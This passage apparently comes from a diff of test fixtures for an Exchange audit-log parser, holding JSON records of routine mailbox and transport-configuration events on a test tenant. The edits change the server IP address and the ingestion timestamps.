"ingested": "2021-12-09T13:42:30.853035200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1292,12 +1292,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1327,7 +1327,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1339,8 +1339,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177608500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853041200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1360,12 +1360,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1396,7 +1396,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1408,8 +1408,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177611300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853046900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1429,12 +1429,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1465,7 +1465,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1477,8 +1477,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177614200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853052600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1498,12 +1498,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1533,7 +1533,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1545,8 +1545,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177617400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853058400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1566,12 +1566,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1602,7 +1602,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1614,8 +1614,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177620400Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ "ingested": "2021-12-09T13:42:30.853064100Z",
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -1635,12 +1635,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1683,7 +1683,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -1695,8 +1695,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177623100Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ "ingested": 
"2021-12-09T13:42:30.853069800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1716,12 +1716,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1764,7 +1764,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -1776,8 +1776,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177626500Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ 
"ingested": "2021-12-09T13:42:30.853075900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1797,12 +1797,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1845,7 +1845,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -1857,8 +1857,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177629300Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 